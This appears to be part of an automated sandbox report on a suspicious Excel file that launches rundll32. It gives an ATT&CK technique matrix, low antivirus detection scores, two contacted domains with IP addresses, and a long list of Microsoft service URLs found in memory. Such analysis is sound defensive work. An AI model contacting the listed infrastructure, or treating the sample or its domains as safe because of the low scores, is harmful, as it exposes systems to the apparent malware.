Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: rundll32.exe, 00000003.00000002.270758884.00000000031C0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.263741374.00000000041C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000003.00000002.270758884.00000000031C0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.263741374.00000000041C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000003.00000002.270758884.00000000031C0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.263741374.00000000041C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000003.00000002.270758884.00000000031C0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.263741374.00000000041C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
afdab907_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalse
    unknown
    fcventasyservicios.cl
    192.185.32.232
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
        high
        https://login.microsoftonline.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
          high
          https://shell.suite.office.com:144305A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
              high
              https://autodiscover-s.outlook.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                  high
                  https://cdn.entity.05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/query05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                        high
                        https://powerlift.acompli.net05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v105A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                          high
                          https://cortana.ai05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspx05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                    high
                                    https://api.aadrm.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                          high
                                          https://cr.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControl05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/Office05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                high
                                                https://graph.ppe.windows.net05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplate05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetect05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                high
                                                                https://graph.windows.net05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/api05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                    high
                                                                    https://prod-global-autodetect.acompli.net/autodetect05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                        high
                                                                                        https://management.azure.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/log05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorize05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v205A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/mac05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.ai05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.com05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devices05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorize05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drfalse
                                                                                                                                                      high
